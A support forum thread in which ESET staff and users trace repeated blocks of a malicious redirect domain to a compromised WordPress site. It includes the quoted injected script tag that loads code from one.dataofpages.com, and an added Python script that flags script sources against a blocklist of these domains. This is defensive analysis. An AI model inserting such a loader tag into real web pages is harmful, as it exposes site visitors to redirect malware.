kapela86 (September 21): I'm getting lots of reports in ESET Protect from different computers that the website "stay.decentralappps.com" was "Blocked by internal blacklist". What I don't know is how this is triggered, i.e. what website tried to load it, because all the reports come from different browsers.
Marcos (ESET Administrator, September 21): It appears to be a malicious server. Please provide logs collected with ESET Log Collector from the machine.
kapela86 (September 21): [attachment] 0c5a17fe-2174-4641-b24d-5ea8fdeb18ad_era-diagnostic-logs_2023-09-21_15-34-14.zip
itman (September 21): Definitely a malicious domain.
Marcos (ESET Administrator, September 21): A SysInspector log was not collected. Please provide it as well.
Marcos (ESET Administrator, September 21): To me it looks like SSL/TLS filtering is not working properly; otherwise Web access protection should have detected the malicious JS before it could be executed. Is the EICAR test file downloaded from https://secure.eicar.org/eicar_com.zip detected upon download?
kapela86 (September 21): Here's the SysInspector log. And about EICAR: it was detected before the browser even downloaded it, but I tested this on my computer, not the one I sent those reports from. All computers have the same policy, except some computers where I use Web Filtering with "*" blocked and allow specific domains. These logs are from that kind of computer.

[attachment] SysInspector log export 2023-09-21 16-30-12.zip
itman (September 21): The EICAR .zip download should have been blocked by Web Access protection, i.e. the HTTP filter:

    Time;Scanner;Object type;Object;Detection;Action;User;Information;Hash;First seen here
    9/21/2023 11:09:05 AM;HTTP filter;file;https://secure.eicar.org/eicar_com.zip;Eicar test file;connection terminated;xxxxxx;Event occurred during an attempt to access the web by the application: C:\Program Files\Mozilla Firefox\firefox.exe (1EA307959A891AA89787D5101669BB3587D8C48C).;D27265074C9EAC2E2122ED69294DBC4D7CCE9141;
Marcos (ESET Administrator, September 21): Are you able to reproduce the detection? If so, is it enough to open Edge, or is the threat detected only after you have opened a specific website?
kapela86 (September 21): If you are talking about stay.decentralappps.com, then I can't reproduce it because I don't know what website triggers this. I could check the web browser history on the other PC tomorrow. And regarding SSL/TLS filtering not working, what do you propose I do?
Marcos (ESET Administrator, September 21), quoting kapela86 (2 minutes earlier): "And regarding SSL/TLS filtering not working, what do you propose to do?"

It's working; I removed my comment. I was looking at the Process column and because of that I erroneously assumed that the detection was triggered on disk.
itman (September 21), quoting Marcos (1 minute earlier): "It's working, I removed my comment. I was looking at the Process column and because of that I erroneously assumed that the detection was triggered on a disk."

Perhaps not on Chrome? The OP's screenshot shows the EICAR .zip detection on disk, not via the HTTP filter.
kapela86 (September 21): I disabled ESET, downloaded the EICAR test file, put it on our internal web server that doesn't have HTTPS, enabled ESET and tried downloading it:
Marcos (ESET Administrator, September 21): HTTPS scanning works; obviously the connection was terminated and the URI contains an https address. Let's try to reproduce the detection first.
itman (September 21): Looks like this domain is well known: https://securedstatus.com/how-to-remove-decentralappps-com/ . As suspected, it is redirect malware.
kapela86 (September 22, edited): Looks like it's epainfo.pl; there is a <_script src="https://one.dataofpages.com/stats/post.js" id="temp_weather_script"></script> in the source. They use WordPress, so it's probably some out-of-date plugin that got hacked.
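The post above found the injection by reading the page source by hand. As an added example (not code from the thread, from ESET, or from the site in question), the script below does the same check mechanically: it parses a page's HTML, lists every script tag that loads from a URL, resolves which host each one loads from, and flags hosts under the domains named in this thread (dataofpages.com, decentralappps.com) separately from ordinary third-party and same-origin scripts. The sample HTML is constructed for the example (the injected tag is the one the poster quoted, with the defanging underscore removed; the jQuery path and cdn.example.net host are assumed), and epainfo.pl is used as the page origin because that is the site the poster named.

```python
"""Audit <script src=...> tags in a page for injected third-party loaders.

Added example, not from the thread or from ESET. Sample input is constructed.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Domains named in the thread as part of this injection chain; subdomains
# such as one.dataofpages.com and stay.decentralappps.com match as well.
KNOWN_BAD = {"dataofpages.com", "decentralappps.com"}


class ScriptSrcCollector(HTMLParser):
    """Collect (src, id) for every <script> tag that carries a src attribute."""

    def __init__(self):
        super().__init__()
        self.scripts = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        a = {k.lower(): v for k, v in attrs}
        if a.get("src"):  # inline scripts (no src) are not external loads
            self.scripts.append((a["src"].strip(), a.get("id")))


def is_blocked(host, blocklist=KNOWN_BAD):
    """True if host equals or is a subdomain of a blocklisted domain."""
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in blocklist)


def script_host(src, page_host):
    """Host a script src loads from; None for non-network schemes (data:, javascript:)."""
    p = urlparse(src)
    if p.scheme and p.scheme not in ("http", "https"):
        return None
    if p.hostname:  # absolute URL or protocol-relative //host/path
        return p.hostname.lower()
    return page_host  # relative path resolves against the page's own origin


def audit_scripts(html, page_url, blocklist=KNOWN_BAD):
    """Return one finding per external script: src, host, id and a verdict."""
    page_host = urlparse(page_url).hostname.lower()
    parser = ScriptSrcCollector()
    parser.feed(html)
    parser.close()
    findings = []
    for src, tag_id in parser.scripts:
        host = script_host(src, page_host)
        if host is None:
            verdict = "non-network"
        elif is_blocked(host, blocklist):
            verdict = "blocked"
        elif host == page_host:
            verdict = "same-origin"
        else:
            verdict = "third-party"
        findings.append({"src": src, "host": host, "id": tag_id, "verdict": verdict})
    return findings


# Constructed sample: a WordPress-style head with the tag quoted in the thread.
SAMPLE_HTML = """<html><head>
<script src="/wp-includes/js/jquery/jquery.min.js"></script>
<script src="https://one.dataofpages.com/stats/post.js" id="temp_weather_script"></script>
<script src="//cdn.example.net/lib.js"></script>
<script>console.log("inline, no src");</script>
</head><body></body></html>"""

if __name__ == "__main__":
    for f in audit_scripts(SAMPLE_HTML, "https://epainfo.pl/"):
        print(f"{f['verdict']:12} {f['host'] or '-':24} {f['src']}  id={f['id']}")
```

Run against a saved copy of the page (for example the output of curl, fetched from a machine you are willing to expose to the site) rather than by visiting it in a browser. Anything with verdict "blocked" is the injected loader; "third-party" entries are worth reviewing against the plugins and CDNs the site is known to use, since a newly added unfamiliar host is the usual sign of a compromised plugin or theme.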
kapela86 (September 22): One other thing: today ESET started blocking that script.
Marcos (ESET Administrator, September 22): The detection was added yesterday. Right now we're working on adding a detection for a related obfuscated malicious JS.
kapela86 (September 22): It kinda sucks that you can't see what URL the user visited that triggered this script. This would be very useful.
itman (September 22), quoting kapela86 (5 hours earlier): "It kinda sux that you can't see what URL user visited that triggered this script. This would be very usefull."

An example of Balada Injector malware deploying stay.decentralappps.com is given in this article: https://www.geoedge.com/balda-injectors-2-0-evading-detection-gaining-persistence/ . Bottom line: any legit but vulnerable web site can be nailed by this.